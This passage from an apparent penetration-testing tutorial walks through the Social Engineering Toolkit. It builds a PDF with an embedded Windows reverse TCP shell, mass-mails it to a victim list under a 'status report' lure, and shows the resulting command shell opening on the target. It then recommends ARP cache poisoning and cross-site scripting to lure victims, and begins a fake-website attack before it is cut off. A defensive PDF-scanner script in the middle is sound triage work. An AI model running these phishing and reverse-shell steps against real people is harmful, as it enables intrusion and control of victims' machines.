first have to create your own payload, you can easily do this by using
the "Create a FileFormat Payload", then from there launch the mass
e-mail attack.
 
1. Perform a Mass Email Attack
2. Create a Social-Engineering Payload
3. Return to Main Menu.
 
Enter your choice: 1
Do you want to create a social-engineering payload now yes or no: yes
 
Select the file format exploit you want.
 
The default is the PDF embedded EXE.
 
 
***** METASPLOIT PAYLOADS *****
 
 
1. Adobe Collab.collectEmailInfo Buffer Overflow
2. Adobe Collab.getIcon Buffer Overflow
3. Adobe JBIG2Decode Memory Corruption Exploit
4. Adobe PDF Embedded EXE Social Engineering
5. Adobe util.printf() Buffer Overflow
6. Custom EXE to VBA (sent via RAR)
 
 
Enter the number you want (press enter for default): 4
You have selected the default payload creation. SET will generate a normal PDF with embedded EXE.
 
1. Windows Reverse TCP Shell
2. Windows Meterpreter Reverse Shell
3. Windows Reverse VNC
4. Windows Reverse TCP Shell (x64)
 
Enter the payload you want: 1
Enter the IP address you want the payload to connect back to you on: 10.211.55.130
Enter the port you want to connect back on: 4444
Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Reading in 'src/msf_attacks/form.pdf'...
[*] Parseing 'src/msf_attacks/form.pdf'...
[*] Parseing Successfull.
[*] Using 'windows/shell_reverse_tcp' as payload...
[*] Creating 'template.pdf' file...
[*] Generated output file /home/relik/SET/src/program_junk/template.pdf
 
 
   Payload creation complete. All payloads get sent to the src/msf_attacks/template.pdf directory
 
Press enter to return to the prior menu.
 
 
As an added bonus, use the file-format creator in SET to create your attachment.
 
 
[-] A previous created PDF attack by SET was detected..Do you want to use the PDF as a payload? [-]
 
 
Enter your answer yes or no: yes
 
Social Engineering Toolkit Mass E-Mailer
 
There are two options on the mass e-mailer, the first would
be to send an email to one indivdual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
 
What do you want to do:
 
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.
 
Enter your choice: 2
 
Which template do you want to use?
 
1. Strange and Suspicious Computer Behavior
2. Email to SysAdmins, can't open PDF
3. Please Open up this Status Report
4. Enter your own message
 
Enter your choice: 3
 
The mass emailer will allow you to send emails to multiple
individuals in a list. The format is simple, it will email
based off of a line. So it should look like the following:
 
john.doe@ihazemail.com
jane.doe@ihazemail.com
wayne.doe@ihazemail.com
 
This will continue through until it reaches the end of the
file. You will need to specify where the file is, for example
if its in the SET folder, just specify filename.txt (or whatever
it is). If its somewhere on the filesystem, enter the full path,
for example /home/relik/ihazemails.txt
 
Enter the path to the file to import into SET: email.txt
Enter your GMAIL email address: relik@gmail.com
Enter your password for gmail (it will not be displayed back to you):
Sent e-mail number: 1
Sent e-mail number: 2
Sent e-mail number: 3
Sent e-mail number: 4
 
 
SET has finished deliverying the emails. Do you want to setup a listener yes or no: yes
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

Now that all the e-mails have been sent and our machine is waiting for a connection, we wait for someone on the other end to open the PDF file attached to the message.

[screenshot: status]

When the user opens the file, they will see the following.

[screenshot: page]

On our Back|Track 4 machine waiting for the connection, the following will happen.

[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (10.211.55.130:4444 -> 10.211.55.140:1079)
 
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
 
C:\Documents and Settings\Administrator\Desktop>
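From the defender's side, the attachment built above depends on a few PDF features a plain form never needs: an /EmbeddedFile stream carrying the EXE and a /Launch or /OpenAction trigger. The scanner below is an added example, not code from SET or from the original post; it decodes PDF name escapes (so /Em#62eddedFile is still caught), inflates compressed streams where object dictionaries can hide, and flags those indicators. The sample PDF bytes are constructed for the demonstration and are not a working exploit file.

```python
import re
import zlib

# Constructed sample: a minimal PDF skeleton with the indicators a
# "PDF embedded EXE" attachment relies on. Not a real payload.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /Type /Action /S /Launch /F (template.exe) >> endobj
5 0 obj << /Type /Filespec /F (template.exe) /EF << /F 6 0 R >> >> endobj
6 0 obj << /Type /Em#62eddedFile /Length 4 >> stream
MZ\x90\x00
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Name tokens a reader acts on; rare in benign forms, common in droppers.
SUSPICIOUS_NAMES = ("EmbeddedFile", "Launch", "OpenAction", "JavaScript", "JS", "AA")


def pdf_names(data: bytes) -> list:
    """Return every PDF name token in data with #xx hex escapes decoded."""
    names = []
    for raw in re.findall(rb"/([^\s/<>\[\]()]+)", data):
        decoded = re.sub(rb"#([0-9A-Fa-f]{2})",
                         lambda m: bytes([int(m.group(1), 16)]), raw)
        names.append(decoded.decode("latin-1"))
    return names


def scan_pdf(data: bytes) -> dict:
    """Count suspicious names and flag an MZ (PE) header inside any stream."""
    streams = re.findall(rb"stream\r?\n(.*?)\r?\nendstream", data, re.DOTALL)
    text = data
    for body in streams:
        try:
            text += zlib.decompress(body)  # /FlateDecode object streams hide dicts
        except zlib.error:
            pass  # not deflate-compressed (raw file data, image, etc.)
    found = {}
    for name in pdf_names(text):
        if name in SUSPICIOUS_NAMES:
            found[name] = found.get(name, 0) + 1
    embedded_exe = any(body.startswith(b"MZ") for body in streams)
    return {"indicators": found, "embedded_exe": embedded_exe,
            "suspicious": bool(found) or embedded_exe}


if __name__ == "__main__":
    print(scan_pdf(SAMPLE_PDF))
```

Run it over a mail-gateway quarantine folder to triage attachments; any hit on /Launch together with an MZ stream is worth blocking outright.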

Another attack option, alongside e-mail, is a fake website carrying a Metasploit payload: after a visit to such a site, a Java applet "signed" by Microsoft is launched, and if the user accepts running the applet, the payload fires. Another option, if we are inside the network, is to "poison" the ARP cache. We will use that scenario in the example given below. However, despite the ARP cache poisoning option, I would recommend combining cross-site scripting with e-mail or phone messages to get the victim to go to your site.

root@bt4:/home/relik/SET# ./set
 
 
    [---]       The Social Engineering Toolkit (SET)     [---]
    [---] Written by David Kennedy (ReL1K) @ SecureState [---]
    [---]               Version: 0.1 Alpha               [---]
 
Welcome to the Social Engineering Toolkit, your one-stop shop
for all of your social engineering needs.
 
Select from the menu on what you would like to do:
 
1. Automatic E-Mail Attacks
2. Website Attacks
3. Update the Metasploit Framework
4. Help
5. Exit the Toolkit
 
Enter your choice: 2
 
The Social Engineering Toolkit "Web Attack" will create a
fake "professional" looking website for you with malicious